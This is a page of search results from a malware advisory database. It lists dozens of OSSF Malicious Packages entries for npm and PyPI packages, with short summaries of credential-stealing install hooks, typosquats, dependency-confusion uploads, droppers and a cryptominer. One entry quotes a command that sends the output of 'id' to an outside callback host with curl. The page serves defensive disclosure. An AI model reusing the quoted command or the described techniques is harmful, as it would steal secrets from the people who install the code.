Lucene search
K

226511 matches found

OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 3:42 p.m.12 views

Malicious code in @immobiliarelabs/backstage-plugin-gitlab (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 00eb86df154a9532085ad285ee63cd4c4f9a95a6fe983b9930cd059dfb4cb3f5 The package ships a binding.gyp at the package root whose targets/sources fields contain GYP command-expansion syntax !... at line 6. npm implicitly...

5.8AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 2:36 p.m.5 views

Malicious code in @carvana.authentication-flows/shared (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 78538bf70d1ebd3e4cd784d90b3961ea7966ce9b97e8124110374cad95c0b894 package.json declares a preinstall hook node index.js that runs unconditionally on npm install. index.js imports childprocess/os/https, collects host...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 2:35 p.m.5 views

Malicious code in express-plugin (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 183cda19ef38d3451b375669fb460577a83217091d96d7fc11d5bf33679c8003 On module load, index.js auto-invokes initPlugin, which HTTP-GETs https://jsonkeeper.com/b/PRA3O, parses the JSON response, and passes the response's...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 2:16 p.m.5 views

Malicious code in ts-einkle (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fa992a8f9afcf95d3c0e35b6abc290ff565b450663f6d43511467cd370eefce8 [email protected] ships a comprehensive installer-side stealer in its main module peer-math.js. On require, syncSession runs a chain packProjectBundle,...

5.8AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 2:15 p.m.5 views

Malicious code in ts-einkle-slot (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f565a21645ed6a288a820dea60e648589a5cca95a91b2c90720f3d2bcadca73b Package is published as ts-einkle-slot but its tarball contents source, README, LICENCE, package.json author/repository/description are copied verbat...

5.8AI score
Exploits0References6
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 2:13 p.m.7 views

Malicious code in @epsteinlovekids483/crossmint-wallets-sdk-pentest (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6e43e5a418541bb3e485010eba536ecc9f1483dba866af53ff4a760684409213 Package's main entry dist/index.cjs unconditionally requires dist/shai-hulud.js at module load. On require, the code harvests installer secrets —...

5.9AI score
Exploits0References9
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 12:16 p.m.7 views

Malicious code in rollup-plugin-polyfill-connect (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware b21017bf70f3f7909beadfff916971711ef9d236ab81797b3bb53569034fa67c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 12:16 p.m.7 views

Malicious code in react-icon-svgs (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware ff5b9a03e2018642801f0a9d253297cf1eb8ce39a8af4152f31bcd045e4768d2 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 11:16 a.m.6 views

Malicious code in ai-node-agent (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 0730db02e46f4cfb224880f60bcdcdd43ed4d1bc97c68ee404428f7c592445cb Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 11:16 a.m.7 views

Malicious code in ai-node-relay (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 15dbf12bf77945563589af277a5a11fc548f282dfb1ab8fb8b0e8253d28ec854 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 10:50 a.m.8 views

Malicious code in inlifegram (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3975a0998bf76dddc25f0138b1d4b408bb06304b3203dc1e62e0110b2b56425f InLifeGram distributes a modified copy of the pyrogram Telegram client library and installs it into the top-level pyrogram import namespace, so impor...

6AI score
Exploits0References3
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 9:23 a.m.6 views

Malicious code in sqligen (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector de59ac5884f286d69e42a71ba0cb7b99aa06d2b1f0e28a279a84d3db86eb3196 setup.py contains an obfuscated install-time dropper that fires on Windows. Two functions with diagnostic-sounding names 'GetDefaultSystemPolicy' /...

6.5AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 9:10 a.m.10 views

Malicious code in dtxto1ols (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 926fc822a2a507fafa6d2e1bb02a9b2bada7d89d3042bd3f0cac0ba2fd7c1991 package.json declares a postinstall script that runs automatically on npm install. The script performs filesystem reconnaissance find / -type f...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 9:6 a.m.7 views

Malicious code in dtxtools (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector de085e4b6d38025a5a0b959b19b1022deaa7525b427e66679b58b6892328297a package.json declares a postinstall lifecycle script that auto-executes on npm install. The hook performs a recursive filesystem search for database...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 5:51 a.m.7 views

Malicious code in @merceas/cross-fetch (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5f6307129b7d9edcbd76ffc93c9d8a6ae146332951d5ce90e659afe1eec01127 Package is published under the @merceas scope as cross-fetch and reuses the upstream cross-fetch README, homepage github.com/lquixada/cross-fetch, an...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 5:51 a.m.6 views

Malicious code in @merceas/anchor (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 86a51319de26245ad91c68a6a6d0713454112443e55f466711e79eb1a23a45b8 Package is published as @merceas/anchor but its README, homepage https://github.com/coral-xyz/anchorreadme, repository, and source are a verbatim cop...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 5:44 a.m.7 views

Malicious code in react-context-form-tdsss (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7a53e75a65681ee9ea818634ddee1ed52c6c8398dbd68e2b6abca255b24aaf37 [email protected] is a dependency-confusion payload. package.json declares scripts.preinstall="node index.js", and index.js issues an...

6.2AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 5:17 a.m.7 views

Malicious code in tw-style-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 0af16d76f3fa788874c372ddcf606db1ee997f80329274dca8049e9638221318 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 5:11 a.m.6 views

Malicious code in pump-stream-logger (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 75034d3c53f657ffc5e0f43c2624e56ae27b9f21c52c17e7d46546223839787c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 5:11 a.m.6 views

Malicious code in pino-zod (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware d57b4e49a62a8ca174c6c14820e5b101d042e3aea94438df19f9b12286a7cf30 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 5:11 a.m.9 views

Malicious code in pump-laserstream-parser (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 6fb903c9973dccd215784f31fb196f88a80e863d1de9e3555c1c1ba2b2af09d8 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 5:4 a.m.8 views

Malicious code in hydanlabs (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 92288b41a62d25886b2aafe73ced1054249d215d131bb4d7e5e2353e1f1a3b5f The CLI hardcodes its LLM backend to a bare-IP, plain-HTTP endpoint http://151.244.40.74:4000 controlled by the package author. Every request POSTs a...

6AI score
Exploits0References4
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 4:51 a.m.6 views

Malicious code in openblox (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cdd874a78973f84b5373fc03a48472c338ca82ef0a258b7614f81a8359da1201 setup.py invokes GetGitCommitHash unconditionally at module top level, so it runs on pip install openblox and any setuptools invocation. On Windows t...

6.5AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 4:42 a.m.7 views

Malicious code in js-price-client-node (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 763a44df6481ee1948ff9fda0b3997a93001acb138b7bbcba1787c3f2f8699f2 On npm install, the package's postinstall script invokes prices in dist/index.js, which resolves the consumer's project root via process.env.INITCWD?...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 4:7 a.m.7 views

Malicious code in js-client-node (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 341a29bc48b39d363662fe66dcf13ca9bc3db921cdae84e53b070fc7b3a935a2 package.json declares a postinstall hook node dist/postinstall.js that runs automatically on npm install. The hook invokes prices in dist/index.js,...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 2:55 a.m.8 views

Malicious code in dttfdsdee (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ae565bed85ec0db27f1ff658c7e9491591ce40edc56f423cd8b1122bc209c69c package.json declares a postinstall script that runs automatically on npm install. The script walks the entire filesystem with find to locate databas...

5.8AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 2:51 a.m.8 views

Malicious code in chai-as-synced (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7bc0ee3e6a8341e046b84880f9faf0a4750f4a261a791b95d1267066d7828071 Package name 'chai-as-synced' impersonates the well-known 'chai-as-promised'. On require, index.js spawns a detached, stdio-ignored Node child runnin...

5.8AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 2:18 a.m.9 views

Malicious code in set-cookie-ease (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b2bf656ba38b4d951239ee29799f510de4a8cb93fcf5d8005db4cd679a8631e6 Package masquerades as js-cookie same banner /! js-cookie v3.0.5 | MIT /, README, and repository.url: git://github.com/js-cookie/js-cookie.git but...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 2:18 a.m.8 views

Malicious code in mongoose-json-format (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2a3dc63cdceb40d6f0fe338bcdbe589689ab2897f44cbb6b7c3d0192b5bd09c5 On require, helpers.js instantiates a Helper whose constructor invokes createLog. createLog base64-decodes the string assigned to HASHKEY decoding to...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 1:56 a.m.8 views

Malicious code in @dervix/ws (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 79b9ab7431b1a6a1250c089e2ea33f54ad92313f587fbd2aabc020c12be55f69 Package @dervix/ws impersonates the popular ws WebSocket library — package.json copies the legitimate ws project's homepage...

6.1AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 1:51 a.m.8 views

Malicious code in wellnpm (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2cce5614817c010bad6d6bd86146713b627ad235b87d9ccd341bd3d996a80119 [email protected] ships a 24MB ELF binary named launch which is the XMRig Monero miner RandomX, cn/upx2, ghostrider algorithm strings, libuv/OpenSSL...

5.8AI score
Exploits0References7
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 1:42 a.m.10 views

Malicious code in animatecss-postcss-plugin (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6be12cec08d0999c157774b746c3e431825ae61635bb8ddddf36061d4602cec7 [email protected] ships a tiny PostCSS plugin factory whose body contains an obfuscator.io-style string-array + RC4 decoder functions...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 1:10 a.m.6 views

Malicious code in @help-forms/application-aff (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ab5ab5493acb5b3ffcab7f80dbdf34e1485bbe5d5d03978949199cdabf6f676a @help-forms/[email protected] ships a heavily obfuscated postinstall script scripts/postinstall.js, obfuscator.io fingerprints: rotated string...

6AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 12:34 a.m.8 views

Malicious code in data-parser-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2fb4c4230fa7663c13b273922ecdf6dad55a30791d1332067841ec011814e5b8 index.js imports childprocess at the top of the module and invokes execSync against bash and zsh at lines 301 and 317. The shape —...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 12:30 a.m.7 views

Malicious code in prism-silq (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6bb3e8b0ded57991e21f137aac7c905348a83f6be7914c4da619c18d2acd280c The package ships a binding.gyp whose sources field uses GYP command-expansion syntax !... at line 6. npm implicitly runs node-gyp rebuild whenever a...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 12:28 a.m.8 views

Malicious code in hexo-shoka-swiper (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 62f045b55721408d94a92f5d65b58d69c98d3dc29d5f4f9327fb8edb4f85eaad The package ships a binding.gyp whose sources field uses GYP command-expansion syntax !... at line 6. npm implicitly runs node-gyp rebuild whenever a...

6.4AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/26 12:22 a.m.6 views

Malicious code in hexo-deployer-wrangler (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ebc95a6a1ae1e522feabf03446f9791372191e27ca9da454717559b6cc6948eb The package ships a binding.gyp file line 6 containing GYP command-expansion syntax !... inside the targets/sources fields. npm implicitly runs...

6.4AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:58 p.m.6 views

Malicious code in random-string-64 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9fea72321e7eb57feb094bc31de2393ec2a56903156e1257a062e40541785b96 The package advertises itself as a 5-line random-string generator, but index.js the declared main contains a hardcoded AES-256-CBC ciphertext blob th...

5.9AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:49 p.m.9 views

Malicious code in extra-huggingface (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c76a4e01b00801049375b9e60419bfba79f9b0afbb02aab5b4117f989296c5d3 The package presents itself as part of the Hugging Face ecosystem but actually ships a remote-access agent. extrahuggingface/init.py re-exports...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:45 p.m.6 views

Malicious code in pyext6cc8cd (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f98319eaa02d50e8a098d9cfaaca054df5acc8238dd08b2e24899f700e029a07 On pip install, setup.py decodes a hex string via bytes.fromhex"6f70656e202d612043616c63756c61746f72".decode.split to the argv open -a Calculator and...

6.1AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:37 p.m.10 views

Malicious code in kelly-stake (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 350ccf4a19896a23680e7478be01909de7f16057f175dc14de1d4e0bb92ad540 On npm install, scripts/install-check.cjs runs as a postinstall hook and performs a two-stage remote-code-execution flow: it fetches a JSON config fr...

6.1AI score
Exploits0References5
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:30 p.m.9 views

Malicious code in gx-npm-lib (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e919710d2f28ec776b8165821ebe2fbe480c1e432ec9416c7b73bd1315ee6a6e Package published at version 99.99.99 under a generic name gx-npm-lib — the canonical dependency-confusion shape used to overshadow internal packages...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:30 p.m.7 views

Malicious code in gx-npm-ui (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 04e5ac6b8b24f2c158c37d3d6ac268bbf7f472433660064491538ee468cfcfcb Package published at version 99.99.99 under the gx-npm- namespace, a shape designed to win npm version resolution against private internal packages o...

5.8AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:29 p.m.7 views

Malicious code in velocityfix (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c937a54c3629f80fb7b92fbdafda502706b6028b43bc4675eb30c55d9bc059e9 Package masquerades as 'Performance fixes for Minecraft Velocity proxy' authored by 'Velocity Team' — Velocity is a Java project from PaperMC and has...

5.8AI score
Exploits0References6
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:28 p.m.5 views

Malicious code in log-update-ts (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8dbad34a92b1a5080681d7966e3c807324847605ee60f874076b85e336860def Package masquerades as Sindre Sorhus's popular 'log-update' library matching name and description claiming 'Log by overwriting the previous output in...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:23 p.m.6 views

Malicious code in @salem_jalal/osc-components (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cb26651411f61b6420c6291f7b3a7a4869bb670f1d4c75ddfc37481c50f3aae7 The package's postinstall hook install.js, wired via package.json scripts.postinstall runs on every npm install and transmits installer host...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:21 p.m.7 views

Malicious code in unsafe-malicious-package (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3579cb796e48f446b07e2dbbce2e301d1a3e87d8a9a35ed1dbe825fc53f29da9 On npm install, the package's postinstall lifecycle script scripts/postinstall.js reads the installer's AWS credentials file at /.aws/credentials and...

5.8AI score
Exploits0References9
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 10:13 p.m.6 views

Malicious code in starship-timeline (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8a4e552337fa70064e0a04644ee5a64378809a85b281eda24707bc9a6eba473f [email protected] ships no real functionality. Its package.json declares a preinstall hook "preinstall": "node index.js" that runs automaticall...

5.9AI score
Exploits0References1
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 9:55 p.m.6 views

Malicious code in runtimekit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ffa393dec171ebd22b63776d7550006d3f9f60ad8726ce1153784080e9038acd lib/index.cjs and lib/index.mjs re-required from lib/readonly.cjs contain a self-executing IIFE that decodes two opaque strings via a custom shuffle...

6AI score
Exploits0References2
OSSF Malicious Packages
OSSF Malicious Packages
added 2026/06/25 9:11 p.m.5 views

Malicious code in mi-test-99-tuapellido (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4b71b66c156e0a54b73b6dd2f2f9e994ac9c1ff9ab4d1f9689f1f930b3097f39 On every import, the package's top-level init.py runs os.system"curl http://6krddfbeqw0pisps3egdsofu9lfc33vrk.oastify.com -d $id". This unconditional...

6.7AI score
Exploits0References2
Total number of security vulnerabilities226511